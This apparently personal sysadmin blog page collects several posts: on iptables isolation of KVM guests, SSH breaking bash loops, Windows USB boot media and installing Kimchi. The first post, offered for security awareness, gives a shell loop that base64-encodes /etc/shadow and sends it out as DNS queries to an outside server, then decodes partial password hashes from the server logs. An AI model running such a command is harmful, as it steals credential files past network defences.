Bitbull Tech Notes - home of free minds ...

transport protected data out of high secured zones by dns requests

I often spend some time in highly isolated and secured networks.
Companies spend a lot of money to protect their sensitive data.

But so far I see often that restrictions are not tight enough.

Since layer7 inspection of https traffic has become a standard, DNS filtering has not.

Getting data out of secure zones by DNS requests is quite easy, so lets start with this example.

What you need to get it running:

  • A server within a secured Zone to push some data out.
  • A Server in the internet where you can read the logs.

 

So lets push out the data from secure zone:

cat /etc/shadow | base64 -w63 | while read line
do 
   host  -tA $L.debug2.org 1.2.3.4
done

This command encoded and transferred the linux password file to my dns server, listening at IP 1.2.3.4

On the target side, I easily can reconstruct the data:

[root@ns ~]# grep debug2.org /var/log/messages | tail -2
Oct 19 08:50:27 ns named[1017]: client 8.7.11.1#55075 (QUFtdnRibHUyL0d6LzoxNzc2MDowOjk5OTk5Ojc6OjoKX2Nocm9ueToqOjE3NzY.debug2.org): view default: query (cache) 'QUFtdnRibHUyL0d6LzoxNzc2MDowOjk5OTk5Ojc6OjoKX2Nocm9ueToqOjE3NzY.debug2.org/A/IN' denied
Oct 19 08:50:27 pan named[1017]: client 8.7.11.1#48274 (wOjA6OTk5OTk6Nzo6Ogo=.debug2.org): view default: query (cache) 'wOjA6OTk5OTk6Nzo6Ogo=.debug2.org/A/IN' denied

[root@pan ~]# grep debug2.org /var/log/messages | cut -d'(' -f2- | cut -d'.' -f1 | base64 -d root:$6$QMXJFcGY$TkVB1fdrSBzM9nlhO...rsPIc3F.35TN2sloEuQofCFO4SSE9Z3/:17760:0:99999:7::: [...] _chrony:*:17760:0:99999:7:::

 

Sometimes, character cases get converted to capital or verse, but in this case it is easy to do the same with base32 or uuencode.

This is not mentioned to be used against the law, but should help to get aware of security ... and its problems.

Thanks

 

 

 

 

 

Quick and dirty isolate 10 vms on kvm host from accessing network

PROD NET: 192.168.1.0/24

VM IP RANGE TO ISOLATE: 192.168.1.221-230

service iptables restart
# last rule, reject all
iptables -I FORWARD -m physdev --physdev-is-bridged -m iprange --src-range 192.168.1.221-192.168.1.230 --dst 192.168.0.0/16 -j REJECT

# accept from test net to dns/dhcp
iptables -I FORWARD -m physdev --physdev-is-bridged -m iprange --src-range 192.168.1.221-192.168.1.230 --dst 192.168.1.50/32 -j ACCEPT

# accept from test net to test net
iptables -I FORWARD -m physdev --physdev-is-bridged -m iprange --src-range 192.168.1.221-192.168.1.230 --dst-range 192.168.1.221-192.168.1.230 -j ACCEPT

# accept from NOT test net to test net
iptables -I FORWARD -m physdev --physdev-is-bridged -m iprange \! --src-range 192.168.1.221-192.168.1.230 --dst-range 192.168.1.221-192.168.1.230 -j ACCEPT

# enable conntracking
iptables -I FORWARD -m physdev --physdev-is-bridged -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT

echo "--- ISOLATED CLASSROM FROM PROD NETWORK ... DONE"

 

Why SSH is breaking bash loops and how to get around

[root@kvm2 bin]# seq 3 | while read i; do echo $i; done
1
2
3
[root@kvm2 bin]# seq 3 | while read i; do echo $i ; ssh kvm1 date ; done
1
Wed Sep 13 15:55:46 CEST 2017
[root@kvm2 bin]# for i in $(seq 3) ; do echo $i ; ssh kvm1 date ; done
1
Wed Sep 13 15:55:54 CEST 2017
2
Wed Sep 13 15:55:54 CEST 2017
3
Wed Sep 13 15:55:54 CEST 2017
[root@kvm2 bin]# for i in $(seq 3) ; do echo $i ; ssh -n kvm1 date ; done
1
Wed Sep 13 15:56:03 CEST 2017
2
Wed Sep 13 15:56:04 CEST 2017
3
Wed Sep 13 15:56:04 CEST 2017

Create Windows 7 USB boot media

Not that easy as with linux, but also not that hard

fdisk /dev/sdh    # create partition as shown below

fdisk -l /dev/sdh
   Device Boot      Start         End      Blocks   Id  System
    /dev/sdh1            2048     7864319     3931136    7  HPFS/NTFS/exFAT

mkfs.ntfs -f /dev/sdh1

if=/usr/lib/syslinux/bios/mbr.bin of=/dev/sdh   # use mbr.bin from syslinux package

mkdir /tmp/iso /tmp/usb

mount SW_DVD5_Win_Pro_7_64BIT.ISO /tmp/iso/
mount /dev/sdh1 /tmp/usb/

cp -rv /tmp/iso/* /tmp/usb/

umount /tmp/iso
umount /tmp/usb

Install Kimchi and Ginger on CentOS7 KVM host

This is a nice web-ui for single kvm virt-hosts

I tried a lot of UIs, but this is so far the best opensource kvm web-ui, which is using libvirt for management.
Why is libvirt important?
It keeps your host open to integrate/migrate from/to other virt solutions, it is the one and only standard so far.
If you do not use libvirt, you have the alternative to use pure-qemu to run your VMs, which isn't really an alternative.
Proxmox is using pure qemu comands with own management solution and this is the reason that no-one ever has ever built a Proxmox management integration.
Good for Proxmox business, bad for comunity, so better go the libvirt way.

I am missing the integration of multiple KVM hosts, but hopefully this is not the latest realease of kimchi !

Thanks Kimchi Team to build this web-ui !!!

CU

Chris

yum -y install epel-release deltarpm chronyd wget 
yum makecache
yum -y update
yum install libvirt-python libvirt libvirt-daemon-config-network qemu-kvm python-ethtool sos \
          python-ipaddr nfs-utils iscsi-initiator-utils pyparted python-libguestfs libguestfs-tools novnc \
          spice-html5 python-configobj python-magic python-paramiko python-pillow virt-top

systemctl enable chronyd
systemctl restart chronyd
# firefox https://github.com/kimchi-project/kimchi/releases/latest

yum -y install http://kimchi-project.github.io/gingerbase/downloads/latest/ginger-base.el7.centos.noarch.rpm \
          http://kimchi-project.github.io/ginger/downloads/latest/ginger.el7.centos.noarch.rpm \
          https://github.com/kimchi-project/wok/releases/download/2.5.0/wok-2.5.0-0.el7.centos.noarch.rpm \
          https://github.com/kimchi-project/kimchi/releases/download/2.5.0/kimchi-2.5.0-0.el7.centos.noarch.rpm

firewall-cmd --add-port 8001/tcp --permanent

systemctl enable wokd nginx
systemctl restart wokd nginx firewalld

Now you can reach the KVM virt UI at:

https://kvm-host:8001

 

undefined

Home ← Older posts